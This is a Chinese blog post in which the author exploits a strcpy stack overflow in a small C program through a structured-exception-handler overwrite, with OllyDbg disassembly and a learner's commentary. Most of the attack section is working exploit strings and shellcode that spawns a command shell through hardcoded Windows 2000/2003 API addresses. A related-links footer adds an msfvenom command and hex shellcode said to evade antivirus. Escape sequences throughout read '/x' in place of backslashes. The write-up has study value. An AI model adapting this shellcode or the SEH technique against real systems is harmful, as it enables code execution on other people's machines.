利用异常处理执行shellcode实例

最新推荐文章于 2022-10-06 08:39:08 发布
最新推荐文章于 2022-10-06 08:39:08 发布
阅读量2.4k 收藏
点赞数
分类专栏: 原创文章 文章标签: exception output c system struct windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kgdiwss/article/details/829439
版权



    在《Q版缓冲区溢出教程》中有一个例子,如下:

#include <stdio.h>
#include <string.h>
char name[] =
"/x41/x41/x41/x41"       //name[0] - name[3]  
"/x41/x41/x41/x41"       //name[4] - name[7] 
"/x41/x41/x41/x41"       //ebp
"/x12/x45/xfa/x7f"         //通用jmp esp地址: 7ffa4512

/* 以下shellcode将开启一个cmd. */
"/x55/x8B/xEC/x33/xC0/x50/x50/x50/xC6/x45/xF4/x4D/xC6/x45/xF5/x53"
"/xC6/x45/xF6/x56/xC6/x45/xF7/x43/xC6/x45/xF8/x52/xC6/x45/xF9/x54/xC6/x45/xFA/x2E/xC6"
"/x45/xFB/x44/xC6/x45/xFC/x4C/xC6/x45/xFD/x4C/xBA"
"/x60/x1e/x80/x7c"  //2003 sp1上LoadLibraryA地址:0x7c801e60
"/x52/x8D/x45/xF4/x50" 
"/xFF/x55/xF0"
"/x55/x8B/xEC/x83/xEC/x2C/xB8/x63/x6F/x6D/x6D/x89/x45/xF4/xB8/x61/x6E/x64/x2E"
"/x89/x45/xF8/xB8/x63/x6F/x6D/x22/x89/x45/xFC/x33/xD2/x88/x55/xFF/x8D/x45/xF4"
"/x50/xB8"
"/x83/xa0/xb8/x77"  //2003 sp1上system地址:0x77b8a083
"/xFF/xD0";

int main()
{
 

 char output[8];
 int i;

 strcpy(output, name);

 for(i=0; i<8 && output[i]; i++)
 {

  printf("//0x%x",output[i]);
 }
 printf("/n");
 return 0;
}
    这里它用的是用jmp esp覆盖返回点的方法,即原保存eip地址的地方被覆盖成了jmp esp,当执行retn时,相当于执行:pop eip,jmp eip。也就是会把jmp esp的地址赋给eip,然后eip就会去执行jmp esp,而由于pop eip时栈顶指针往下(即高址方向)移了一字节,刚好指向我们的shellcode地址,所以jmp esp就会执行到我们的shellcode了。
    后来看了利用异常处理来执行shellcode的方法,很想找个机会实践实践,于是我对上面这个程序重新进行了分析,把原来jmp esp的溢出方式改成了jmp ebx方式,分析过程如下:

    首先将char name[]的值赋的长一点(具体多长我心里也没数),使其覆盖异常处理入口,用debug模式编译出程序,然后用OllyDbg V1.10反汇编,代码如下:

00401270 s>/$  55            push ebp
00401271   |.  8BEC          mov ebp,esp
00401273   |.  6A FF         push -1
00401275   |.  68 38014200   push strcpyFl.00420138
0040127A   |.  68 743F4000   push strcpyFl.00403F74           ;SE 句柄安装
0040127F   |.  64:A1 0000000>mov eax,dword ptr fs:[0]         ;此时栈顶值即为异常处理函数地址,即ESP=0012FFB4
00401285   |.  50            push eax
00401286   |.  64:8925 00000>mov dword ptr fs:[0],esp
0040128D   |.  83C4 F0       add esp,-10
00401290   |.  53            push ebx
00401291   |.  56            push esi
00401292   |.  57            push edi
00401293   |.  8965 E8       mov dword ptr ss:[ebp-18],esp

    为什么这里栈顶值就是异常处理入口呢?这里涉及到异常处理的一些原理,可以看看czy写的《利用SEH执行shellcode》,文章地址:http://elfhack.whitecell.org/chinesedocs/seh1.txt
    他文章写的有些难度,像我等菜鸟估计也不好懂,这里我将我自已的理解写出来,大家可以参考一下。他文章中提到,fs:[0]指向一个_EXCEPTION_REGISTRATION结构(我理解就是指向异常处理入口),这个_EXCEPTION_REGISTRATION结构如下:

struct _EXCEPTION_REGISTRATION
{
    前一个_EXCEPTION_REGISTRATION结构;
    异常处理函数入口;
}

    每个_EXCEPTION_REGISTRATION结构包括两个指针,前一个指针指向前一个_EXCEPTION_REGISTRATION,以形成一个链(如果不懂什么叫链可以看一下c语言版的数据结构)。后一个指针指向的是异常处理函数的地址。
    这里要提醒一点,异常处理入口和异常处理函数的地址是不同的,如下:

struct _EXCEPTION_REGISTRATION                <--地址1,这里对应的就是异常处理函数地址-4,即0012FFB0
{
    前一个_EXCEPTION_REGISTRATION结构;  <--地址2,这里的值和地址1是一样的
    异常处理函数入口;                                            <--地址3,这里对应的就是上面分析出来的0012FFB4
}

    异常处理入口指的是地址1,其实地址1和地址2的值是一样的,因为结构的地址其实就是结构中第一个成员的地点。
    异常处理函数的地址(地址3) = 前一个_EXCEPTION_REGISTRATION结构(地址2) + 4,为什么是加4呢?因为地址2是指针,占4个字节。

    前面说的fs:[0]指向一个_EXCEPTION_REGISTRATION结构,就是指fs:[0]指向地址1(也就是地址2),当发生异常的时候,会执行地址3指向的函数,我们要做的有两件事情,一是将地址1的值换成jmp 04,二是将地址3中的值换成jmp ebx。 jmp 04对应的值为:"04eb9090,所以也就是要将地1的值换成:04eb9090。而jmp ebx的通用地址是:0x7ffa1571,所以就是将地址3的值换成7ffa1571。

    接下来我们要做的就是找到返回点的地址(其实jmp esp例子中已经找过了)。

    继续跟踪,发现00401354处的call里执行的就是我们的代码,按F7跟进去。

00401354   |.  E8 ACFCFFFF   call strcpyFl.00401005

    这一句执行后,就会跳到下面:

00401005   /$ /E9 06000000   jmp strcpyFl.00401010
0040100A   |  |CC            int3
0040100B   |  |CC            int3
0040100C   |  |CC            int3
0040100D   |  |CC            int3
0040100E   |  |CC            int3
0040100F   |  |CC            int3
00401010   |> /55            push ebp
00401011   |.  8BEC          mov ebp,esp
00401013   |.  83EC 4C       sub esp,4C
00401016   |.  53            push ebx
00401017   |.  56            push esi
00401018   |.  57            push edi
00401019   |.  8D7D B4       lea edi,dword ptr ss:[ebp-4C]
0040101C   |.  B9 13000000   mov ecx,13
00401021   |.  B8 CCCCCCCC   mov eax,CCCCCCCC
00401026   |.  F3:AB         rep stos dword ptr es:[edi]
00401028   |.  68 98334200   push strcpyFl.00423398
0040102D   |.  8D45 F8       lea eax,dword ptr ss:[ebp-8]
00401030   |.  50            push eax
00401031   |.  E8 0A010000   call strcpyFl.00401140
00401036   |.  83C4 08       add esp,8
00401039   |.  C745 F4 00000>mov dword ptr ss:[ebp-C],0
00401040   |.  EB 09         jmp short strcpyFl.0040104B
00401042   |>  8B4D F4       /mov ecx,dword ptr ss:[ebp-C]
00401045   |.  83C1 01       |add ecx,1
00401048   |.  894D F4       |mov dword ptr ss:[ebp-C],ecx
0040104B   |>  837D F4 08     cmp dword ptr ss:[ebp-C],8
0040104F   |.  7D 24         |jge short strcpyFl.00401075
00401051   |.  8B55 F4       |mov edx,dword ptr ss:[ebp-C]
00401054   |.  0FBE4415 F8   |movsx eax,byte ptr ss:[ebp+edx-8]
00401059   |.  85C0          |test eax,eax
0040105B   |.  74 18         |je short strcpyFl.00401075
0040105D   |.  8B4D F4       |mov ecx,dword ptr ss:[ebp-C]
00401060   |.  0FBE540D F8   |movsx edx,byte ptr ss:[ebp+ecx-8]
00401065   |.  52            |push edx                                ; /Arg2
00401066   |.  68 20004200   |push strcpyFl.00420020                  ; |Arg1 = 00420020 ASCII "/0x%x"
0040106B   |.  E8 50000000   |call strcpyFl.004010C0                  ; /strcpyFl.004010C0
00401070   |.  83C4 08       |add esp,8
00401073   |.^ EB CD         /jmp short strcpyFl.00401042
00401075   |>  68 1C004200   push strcpyFl.0042001C                   ; /Arg1 = 0042001C
0040107A   |.  E8 41000000   call strcpyFl.004010C0                   ; /strcpyFl.004010C0
0040107F   |.  83C4 04       add esp,4
00401082   |.  33C0          xor eax,eax
00401084   |.  5F            pop edi
00401085   |.  5E            pop esi
00401086   |.  5B            pop ebx
00401087   |.  83C4 4C       add esp,4C
0040108A   |.  3BEC          cmp ebp,esp
0040108C   |.  E8 9F010000   call strcpyFl.00401230
00401091   |.  8BE5          mov esp,ebp
00401093   |.  5D            pop ebp
00401094   /.  C3            retn          ;这里是返回点,此时ESP=0012FF84,

    从上面分析可知,返回点地址为0012FF84,异常处理入口点为:0012FFB0,结合jmp esp例子,我们可以得到要覆盖的结果了:

"/x41/x41/x41/x41"       //name[0] - name[3]  
"/x41/x41/x41/x41"       //name[4] - name[7] 
"/x41/x41/x41/x41"       //ebp
"/x12/x45/xfa/x7f"         //通用jmp esp地址: 7ffa4512

"/x41/x41/x41/x41"      //从这里开始覆盖40个字节长度,就能达到异常处理入口处了    |
"/x41/x41/x41/x41"      //                                                                                                             |
...                                   //                                                                                                       40字节
"/x41/x41/x41/x41"      //                                                                                                             |
"/x41/x41/x41/x41"      //                                                                                                             |

"/x90/x90/xeb/x04"     //这里就是异常处理入口了,覆盖成:jmp 04
"/x71/x15/xfa/x7f"        //这里是异常处理函数地址,覆盖成jmp ebx的通用地址:7ffa1571

    从以上的shellcode也可以看出来,异常处理入口前面的字符长度为8+4+4+40=56字节。这前面的56字节我们可以用随意构造。最后成功溢出的代码如下:

/*
 * strcpyFlow.c
 * by:∮明天去要饭
 * http://blog.csdn.net/kgdiwss
 */

#include <stdio.h>
#include <string.h>

char name[] =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcd" 
//56个字节(前8字节为output[8]的长度,后48字节为溢出的长度)
"/x90/x90/xeb/x04"    //jmp 04
"/x71/x15/xfa/x7f"      //jmp ebx通用地址

//以下shellcode将开启一个cmd.
"/x55/x8B/xEC/x33/xC0/x50/x50/x50/xC6/x45/xF4/x4D/xC6/x45/xF5/x53"
"/xC6/x45/xF6/x56/xC6/x45/xF7/x43/xC6/x45/xF8/x52/xC6/x45/xF9/x54/xC6/x45/xFA/x2E/xC6"
"/x45/xFB/x44/xC6/x45/xFC/x4C/xC6/x45/xFD/x4C/xBA"
"/x23/x80/xE7/x77"   //2000 sp0上LoadLibraryA地址:0x77E78023
"/x52/x8D/x45/xF4/x50" 
"/xFF/x55/xF0"
"/x55/x8B/xEC/x83/xEC/x2C/xB8/x63/x6F/x6D/x6D/x89/x45/xF4/xB8/x61/x6E/x64/x2E"
"/x89/x45/xF8/xB8/x63/x6F/x6D/x22/x89/x45/xFC/x33/xD2/x88/x55/xFF/x8D/x45/xF4"
"/x50/xB8"
"/xAD/xAA/x01/x78"   //2000 sp0上system地址:0x7801AAAD
"/xFF/xD0";


int main()
{
 
 
 char output[8];
 int i;

 strcpy(output, name);
 
 for(i=0; i<8 && output[i]; i++)
 {
  
  printf("//0x%x",output[i]);
 }
 printf("/n");

 return 0;
}

    此程序运行到返回点时,堆栈中的数据如下:

运行后效果截图(弹出一个cmd):

    本例代码在windows2000 sp0上溢出通过。
   虽然这只是一个小小的实验,但花了我好多天的时间, 本人在测试过程中遇到如下问题:
    1。异常处理函数地址我找不到。
    2。我将windwos2003上的shellcode用在了windows2000 sp0上,却忘了进行修改,后来跟踪时才发现其实已经执行我的shellcode了,只是由于system等函数地址不正确才会又提示异常。
    所以说菜鸟每走一步都是很辛苦的,当我早上溢出成功的时候,真的是非常的高兴。同时再一次验证了:人要靠自已这句话。在测试过程中当然也问了不少朋友,无论他们有没有能提供帮助,都非常感谢他们。
   另外就是本人初学溢出编程,所以文章中如果发现了错误,请告知本人,不胜感激。

kgdiwss
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
shellcode 执行
01-04
//msfvenom -p windows/exec CMD=calc.exe -f exe -e x86/shikata_ga_nai -i 6 -f c 生成shellcod 测试数据: bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 将shellcode作为参数传入执行盒,./shllcode_Argv.exe bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 即可执行该段shellcode。 该exe可传vt查看报毒情况,无特征码
WINDOWSSHELLCODE编写高级技巧
老鬼的专栏
07-30 1542
WINDOWSSHELLCODE编写高级技巧   作者:yuange (mailto:[email protected]) 主页:http://www.nsfocus.com/       unix等系统因为有用户概念,所以往往溢出是使用先得到普通帐号,然后登陆后用溢出 再加载一个SHELL的办法得到ROOT权限,其系统调用又方便,所以SHELLCODE编写一般都比 较简单。但WINDO
Hook ZwQueryInformationProcess 函数使得异常处理可以在shellcode执行
lif12345的专栏
09-27 1608
32位系统上当你的shellcode有使用 __try __except 进行处理时,系统最终会调用RtlIsValidHandler来判断异常处理函数是否有效,如果你希望处理异常 应该是HookRtlIsValidHandler,可是微软没有导出这个接口 于是我们逆向看看RtlIsValidHandler 发现它会判断ZwQueryInformationProcess的返回值,...
《0day安全》——利用 S.E.H
weixin_50287973的博客
09-07 191
利用 Windows 异常处理机制的基本思路 (1)S.E.H 存放在栈内,故溢出缓冲区的数据有可能淹没 S.E.H。 (2)精心制造的溢出数据可以把 S.E.H 中异常处理函数的入口地址更改为 shellcode 的起始地址。 (3)溢出后错误的栈帧或堆块数据往往会触发异常。 (4)当 Windows 开始处理溢出后的异常时,会错误地把 shellcode 当作异常处理函数而执行。 在栈溢出中利用 S.E.H 代码 #include "stdio.h" #include <windows.h>
Windows安全机制---异常处理保护:Safe机制
每昔的博客
10-09 1513
文章目录Windows安全机制异常处理保护:SafeSEH原理绕过攻击返回地址利用虚函数绕过从堆中绕过利用未启用SafeSEH模块绕过SafeSEH利用加载模块之外的地址绕过利用ActiveX控件绕过SafeSEH Windows安全机制 微软关于内存保护机制 GS编译技术 SEH的安全校验机制 Heap Cookie,Safe Unlinking等一系列堆安全机制 DEP数据执行保护 ASLR...
shellcode 之 JMP ESP 与 JMP EBX
06-30 3537
堆栈溢出在我们exploit时常用到,利用其一般方式是:JMP ESP 与 JMP EBX; 昨天有一“同学”问我关于JMP EBX详细的问题,所以在此介绍一下:1 JMP ESP函数调用后的堆栈结构:    L    L -> child program of Local variable    L -> 一般情况下此处保存的ebp    R -> EIP for ret
5.6 在栈溢出中利用S.E.H
qq_55202378的博客
10-06 469
栈溢出 S.E.H
演示几种用c语言来执行shellcode(其实也就是机器码)的方式,shellcode(示例代码)
weixin_36200896的博客
05-24 809
简介这篇文章主要介绍了shellcode(示例代码)以及相关的经验技巧,文章约1446字,浏览量241,点赞数8,值得推荐!/** 作者: 冷却* 时间: 2009年2月21日* E-mail: [email protected]* 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///一段打开Windo...
让其他程序强行执行自己的 ShellCode【C++】
LiWeiHua01的博客
09-08 591
让其他程序执行自己的代码
瑞星各程序详解
要饭's Blog
07-12 1400
AddrBook.exe ——瑞星短信通的地址簿程序 CCenter.exe ——瑞星信息中心 MakeDisk.exe ——制作软盘 PATCH.EXE 打——包工具 Rav.exe ——杀毒主程序 RavCopy.exe 升级程序--升级和文件下载靠它 RAVDOS.EXE DOS——主程序 RavHDBak.exe ——硬盘数据备份 RavMon.exe 计算机监控SHELL程序--实时监控
Windows漏洞利用开发系列教程第三部分:结构化异常处理
01-11
翻译国外的一个二进制漏洞学习教程, 非常适合刚学习漏洞的新人。
EvilWMIProvider:安装并执行Shellcode
05-19
EvilWMI提供者 安装并执行ShellcodeWindows 7 x64 SP1上测试 反馈欢迎
利用图片隐写术来远程动态加载shellcode1
08-03
1. 最开头的两个十六进制为 42H,4DH 转为 ASCII 后分别表示 BM,所有的 BMP 文件都以这 2. 红色箭头是图片的大小(这里对应的十六进制为
AlternativeShellcodeExec:通过回调执行其他Shellcode
03-03
替代代码执行 根据Microsoft的说法,回调函数是托管应用程序中的代码,可帮助非托管DLL函数完成... 该存储库包含可用于执行与位置无关的shellcode的回调函数列表,以便CreateThread成为过去式:P。 对和 yall的很。
通过回调执行其他Shellcode-C/C++开发
05-27
替代代码执行这种方法的受欢迎程度超出了预期,因此我只是想对alfarom256进行喊叫,以便向我介绍cal替代代码执行这种方法的受欢迎程度超过了预期,因此我只是想对alfarom256进行喊叫,以通知我关于回调函数,并向我...
Session登陆后丢失的解决办法。
热门推荐
要饭's Blog
03-04 1万+
最近做网站后台的时候,登陆后发现刷新页面时Session会丢失,过几秒钟也会自然丢失,查了资料后发现可以这样解决:1。打开web.config文件,设置如下:          默认情况下,ASP.NET 使用 Cookie 来标识哪些请求属于特定的会话。          如果 Cookie 不可用,则可以通过将会话标识符添加到 URL 来跟踪会话。         若要禁用 Cookie,请设
一个C的实验及疑惑
要饭's Blog
06-08 9112
  #include#include#includestruct STU{ char name[20]; char stuno[10]; int age; int score;}stu[50];typedef struct STU ElemType;struct LNODE{ ElemType data; struct LNODE *next;};typedef struct LN
在ASP.NET中怎么用SESSION判断用户是否登录?(原创)
要饭's Blog
06-23 7435
        代码很简单的,我把我平时写过的贴出来给大家看看:if (bResult == true)   //登录的用户名和密码正确    {     //保存登录的用户名     Session["LoginUser"] = FormatString.Replace(txtLoginUser.Text);  //这里就是给session赋值了.我对登录用户进行了一些安全处理     //转到
电子邮件正则表达式解释
要饭's Blog
08-09 6114
/w+([-+.]/w+)*@/w+([-.]/w+)*/./w+([-.]/w+)*这是vs2003中正则表达式编辑器生成的电子邮件的正则表达式,它的意思是:/w+ 必须以一个a-z,A-Z,0-9或_这些字符中的一个开头。([-+.]/w+)* 的意思是:允许0个或是多个-+.a或-+.aa这样的字符,也就是说,到这里为止,邮件的地址可以是:a-aa+aaa.aaa这种作为开头。接下来@就不用
调用enumdisplaymonitors执行shellcode
最新发布
10-05
调用EnumDisplayMonitors函数可以用来枚举系统中的所有显示器。而Shellcode是一段被编码的机器指令,用于实现特定功能或进行恶意操作。将调用EnumDisplayMonitors和执行Shellcode结合在一起,可以实现一些特定的功能或攻击。 一种可能的应用场景是,在恶意软件中使用调用EnumDisplayMonitors执行Shellcode的方法,以实现屏幕监控或远程控制的功能。通过调用EnumDisplayMonitors函数可以获取系统中的所有显示器信息,包括分辨率、位置等,从而可以监听或截取显示器的画面。接下来,将编写好的Shellcode注入到恶意程序中,通过执行Shellcode来进行屏幕捕获、存储或远程传输,达到监控或控制的目的。 另一种可能的应用场景是,使用调用EnumDisplayMonitors执行Shellcode的方法进行系统攻击。通过枚举系统中的所有显示器,可以获取到显示器的相关信息,例如分辨率、颜色位数等,再结合Shellcode执行,可以针对特定显示器进行恶意操作,如篡改显示器的分辨率、改变颜色设置等,从而干扰用户的正常使用,或者进行其他恶意活动,如勒索、敲诈等。 需要注意的是,调用EnumDisplayMonitors执行Shellcode并进行相关操作属于恶意行为,会对用户的隐私和系统安全造成严重威胁。因此,用户和系统管理员应当保持警惕,定期升级和更新系统、杀毒软件,并避免下载和运行来历不明或不可信的程序,以确保系统的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值